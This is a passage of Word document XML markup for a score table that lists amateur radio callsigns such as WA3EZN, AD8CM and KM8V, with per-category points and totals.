        <w:gridCol w:w="969"/>
        <w:gridCol w:w="741"/>
        <w:gridCol w:w="741"/>
        <w:gridCol w:w="912"/>
        <w:gridCol w:w="736"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="05B4BEA8" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E0E66FC"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WA3EZN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3991D20D"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A3403FB"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2889840F"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E9BFF0D"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335</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01947A21"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="381E06C0"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72F5C785"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59F42177"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465</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="48456C3F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0202E024"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AD8CM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="435D85E4"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75E65A3D"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2120C1E9"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00BBC2EB"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215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E31587C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="061C5FD9"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0995BBC3"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5050D698"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305</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="7787B611" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A567D5D"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W8DJG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53140F68"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="439FF295"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A2A03E3"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68E3F96C"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115</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CE49BE6"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="393D7D1A"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06F53148"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07703AAD"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245</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="6C6C6DF7" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C60A55C"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N2LC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12B48594"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3275395C"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="562659E9"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1854112B"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C236A12"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25A9315F"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66D7D4AA"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01065EB8"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170</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="34E97FDB" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16C3949F"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KD8UUB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68294863"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12CAF9C0"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38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FDBF0ED"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03B67417"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70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09904E7B"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="001F7A09"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52996B55"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62B78155"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158</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="7B1E2986" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CDAD690"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N8SY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="726642A1"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5816FF1E"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0545F9A5"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6886D6F3"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="17F12855"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19A5089E"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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B4850AA"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="504B7D99"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155</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="12617A2B" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F2BFCCE"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KM8V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="658E3FE1"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D357ACC"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27B4B8B5"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B1EAE00"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43062352"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D85DB27"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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73354341"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
